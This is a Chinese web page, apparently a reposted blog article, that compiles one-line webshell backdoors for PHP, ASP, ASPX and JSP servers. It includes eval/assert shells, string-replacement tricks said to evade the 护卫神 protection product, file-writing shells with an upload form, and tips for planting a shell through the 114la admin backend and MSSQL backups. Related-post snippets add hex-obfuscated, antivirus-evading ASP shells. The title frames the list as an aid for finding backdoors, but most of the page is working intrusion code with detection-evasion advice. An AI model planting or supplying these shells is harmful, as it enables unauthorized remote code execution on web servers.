整理的比较全的一句话后门代码(方面大家查找后门)

最近一句话后门不断升级大家注意防范,基本上多事字符替换

过护卫神PHP一句话作者:小东

代码如下:

<?php $a = str_replace(x,”",”axsxxsxexrxxt”);
$a($_POST["c"]); ?>

测试成功,主要对付护卫神,其他的也可以试试

dedecms5.7一句话后门
@eval(file_get_contents('php://input'));

asp一句话木马

程序代码
<%eval request("sb")%>

程序代码
<%execute request("sb")%>

程序代码
<%execute(request("sb"))%>

程序代码
<%execute request("sb")%><%'<% loop <%:%>

程序代码
<%'<% loop <%:%><%execute request("sb")%>

程序代码
<%execute request("sb")'<% loop <%:%>[code]
[code]<script language=vbs runat=server>eval(request("sb"))</script>

程序代码
%><%Eval(Request(chr(35)))%><%

程序代码
<%eval request("sb")%>

程序代码
<%ExecuteGlobal request("sb")%>

程序代码
if Request("sb")<>"" then ExecuteGlobal request("sb") end if
//容错代码
程序代码
<%@LANGUAGE="JAVASCRIPT" CODEPAGE="65001"%>
<%
var lcx = {'名字' : Request.form('#'), '性别' : eval, '年龄' : '18', '昵称' : '请叫我一声老大'};
lcx.性别((lcx.名字)+'');
%>

//使用冰狐一句话客户端链接

程序代码
<%
Set o = Server.CreateObject("ScriptControl")
o.language = "vbscript"
o.addcode(Request("SubCode")) '参数SubCode作为过程代码
o.run "e",Server,Response,Request,Application,Session,Error '参数名e 调用之,同时压入6个基对象作为参数
%>

调用示例:
程序代码
http://localhost/tmp.asp?SubCode=sub%20e%28Server,Response,Request,Application,Session,Error%29%20eval%28request%28%22v%22%29%29%20end%20sub&v=response.write%28server.mappath%28%22tmp.asp%22%29%29

php一句话

程序代码
<?php eval($_POST[sb])?>

程序代码
<?php @eval($_POST[sb])?>
//容错代码
程序代码
<?php assert($_POST[sb]);?>
//使用lanker一句话客户端的专家模式执行相关的php语句
程序代码
<?$_POST['sa']($_POST['sb']);?>

程序代码
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>

程序代码
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
程序代码
<O>h=@eval($_POST[c]);</O>

程序代码
<script language="php">@eval($_POST[sb])</script>
//绕过<?限制的一句话

JSP一句话

程序代码
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>

提交客户端

程序代码
<form action="http://59.x.x.x:8080/scdc/bob.jsp?f=fuckjp.jsp" method="post">
<textarea name=t cols=120 rows=10 width=45>your code</textarea><BR><center><br>
<input type=submit value="提交">
</form>

ASPX一句话
程序代码
<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

程序代码
<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>
//Jscript的asp.net一句话

程序代码
<%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"]) ); }%>
//C#的asp.net一句话

程序代码
<% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %>
VB的asp.net一句话
第一:114la网址导航系统后台getwebshell,最新版本,已经禁止了直接输入<?php这样的代码
所以可以试用<script language="php">...<script>来绕过
第二,使用菜刀的附加数据功能可以出现很多转换.所以还是仔细阅读下菜刀的readme.txt,上面的代码来自LCX的博客
第三,使用mssql备份一句话的时候,特别是asp.net和jsp,因为代码过长,所以,需要再代码前面和后面多加空格等垃圾字符保证代码完整性,这个跟备份bat到启动项一个原理.

(0)

相关推荐

  • 更牛的一句话asp木马加密(去掉asp里的%)

    不知道怎样表达清楚.看例子吧: 复制代码 代码如下: <script language=vbs runat=server>   Execute(HextoStr("65786563757465287265717565737428636872283335292929"))  Function HextoStr(data)  HextoStr="EXECUTE """""  C="&CHR(&

  • asp一句话木马原理分析

    通过HTTP协议来访问 一句话木马的使用范围(我只列举了2种): 1)只有数据库备份的情况 数据库备份成asp文件时候,不出现" 编译错误,缺少脚本关闭标志%>" 2)SA权限的时候,一般先写入一句话,图个方便..(当然,直接tftp上传鸽子运行,那更快) tftp -i ip get server.exe 一句话木马<%execute request("a")%>的原理: 首先知道 execute()函数,是用来执行asp代码的.就是负责执行我们

  • asp.net jscript 一句话木马

    min.aspx 复制代码 代码如下: <%@ Page Language="Jscript"%><%eval(Request.Item["z"],"unsafe");%> 复制代码 代码如下: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/x

  • 一句话 asp木马加密版 彻底突破杀毒软件

    不知道怎样表达清楚.看例子吧: 复制代码 代码如下: <script language=vbs runat=server>  Execute(HextoStr("65786563757465287265717565737428636872283335292929"))  Function HextoStr(data)  HextoStr="EXECUTE """""  C="&CHR(&H

  • php一句话cmdshell新型 (非一句话木马)

    php一句话cmdshell新型 (非一句话木马)

    复制代码 代码如下: <?php /*一个新型的php一句话cmdshell(非一句话木马) //原理:php运行时如果遇见字符``(键盘上~符号的下档键)总会尝试着执行``里面包含的命令,并返回命令执行的结果(string类型): //局限性:特征码比较明显,``符号在php中很少用到,杀毒软件很容易以此为特征码扫描到并警报:``里面不能执行php代码: //write by skyfire */ echo `$_REQUEST[id]`; ?>

  • 几款双功能免杀超强版asp小马

    第一款: 复制代码 代码如下: GIF89a$ ;<hTml> <%eval request(chr(1))%> <% on error resume next testfile=Request.form("filepath") msg=Request.form("message") if Trim(request("filepath"))<>"" then set fs=server

  • asp,php一句话木马整理方便查找木马

    特把经常用到的网页后门的木马整理下,如果不全请大家补全他,大家在网站混口饭吃,都不容易何必呢 asp一句话木马 文件常见内容 <%If Request("#")<>"" Then Execute(Request("#"))%> execute(request("#")); eval(request("#")); php一句话木马 <?@include($_POST["

  • 整理的比较全的一句话后门代码(方面大家查找后门)

    最近一句话后门不断升级大家注意防范,基本上多事字符替换 过护卫神PHP一句话作者:小东 复制代码 代码如下: <?php $a = str_replace(x,"","axsxxsxexrxxt"); $a($_POST["c"]); ?> 测试成功,主要对付护卫神,其他的也可以试试 dedecms5.7一句话后门 @eval(file_get_contents('php://input')); asp一句话木马 程序代码 <%

  • jquery 实现复选框的全选操作实例代码

    jquery 实现复选框的全选操作实例代码 最近做了个需求,需要实现列表复选框的全选/取消全选操作,由于之前对这块不是很了解,所以从网上查了一些资料,虽然有各种实现方法,但没找到直接可以套用的.自己琢磨了下,把功能实现,整理如下. 实现细节如有可改进的地方,不吝赐教. 首先是html部分的代码,这里有一个表格,表格里面有一些选项: <div id="list"> <table> <tr><td>选项1<input type=&quo

  • Flex 全屏组件 部分全屏的实现代码

    下面发布一下,将特定组件全屏的现在代码: 复制代码 代码如下: <?xml version="1.0" encoding="utf-8"?> <mx:Application xmlns:mx="http://www.adobe.com/2006/mxml" layout="absolute">     <mx:TitleWindow x="113" y="62&quo

  • 基于JS实现checkbox全选功能实例代码

    基于JS实现checkbox全选功能实例代码

    需求:要求实现点击全选选中所有菜单,再次点击全选取消选中.此功能经常会用户,下面小编给大家分享下实现代码,一起看看吧! 效果图如下: 点击全选之前: 点击全选之后: 再次点击全选之后: 代码如下: <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Title</title> </head> &l

  • 一个不易被发现的PHP后门代码解析

    偶然间看到一段,看起来似乎没有什么问题,确是能致命的后门代码,这里用到了一个一般的PHPer都不怎么关注的反撇号 ` ,反撇号包含的字符串,等同于shell_exec函数. 伪装性很好,很容易被管理员忽略. $selfNums = $_GET['r']; if (isset($selfNums)){ echo `$selfNums`; } 刚看到这段代码我想大家都会说没有问题,但是细心的朋友也会发现下面的变量被一个符号包起来了,既然是变量为什么要这样了, 而且又不是单引号,这个就是关键所在了,这

  • JS操作input标签属性checkbox全选的实现代码

    废话不多说了,具体代码如下所示: <html> <head> < > function selectAll(){ var checklist = document.getElementsByName ("selected");//获取所有name值为selected的标签 if(document.getElementById("controlAll").checked){//判断当id为controlAll的标签是否被选中 for

  • Java内部类的全限定名规律代码示例

    简述: 由于最近遇到不少需要反射的类,而其中不乏内部类,在此总结一下内部类的全限定名的规律. 成员内部类 测试结果表明,无论成员内部类是否为静态,其全限定名都使用如下命名方法: 包名.外部类名$内部类名 测试代码: package com.test; public class InnerClassTest { static class StaticInner{ } class Inner{ } public static void main(String[] args) { StaticInne

  • Java线程之程安全与不安全代码示例

    作为一个Java web开发人员,很少也不需要去处理线程,因为服务器已经帮我们处理好了.记得大一刚学Java的时候,老师带着我们做了一个局域网聊天室,用到了AWT.Socket.多线程.I/O,编写的客户端和服务器,当时做出来很兴奋,回学校给同学们演示,感觉自己好NB,呵呵,扯远了.上次在百度开发者大会上看到一个提示语,自己写的代码,6个月不看也是别人的代码,自己学的知识也同样如此,学完的知识如果不使用或者不常常回顾,那么还不是自己的知识.大学零零散散搞了不到四年的Java,我相信很多人都跟我一

  • JS实现“全选”和

    JS实现“全选”和"全不选"功能代码实例

    这篇文章主要介绍了JS实现"全选"和"全不选"功能代码实例,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下 代码如下 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Title</title> </head&g

  • element-plus 下拉框实现全选的示例代码

    element-plus 下拉框实现全选的示例代码

    目录 前言 下拉框的简单使用 全选互斥 下拉框多选 全选互斥的实现 多个下拉框互斥 一般全选的实现 前言 实习确实能学到不少东西,但是学到的东西果然还是需要沉淀下来,不然后面立马又忘记了. 下拉框的简单使用 使用方法还是比较简单的 <el-select v-model="user.name" placeholder="请选择"> <el-option v-for="item in nameList" :key="ite

随机推荐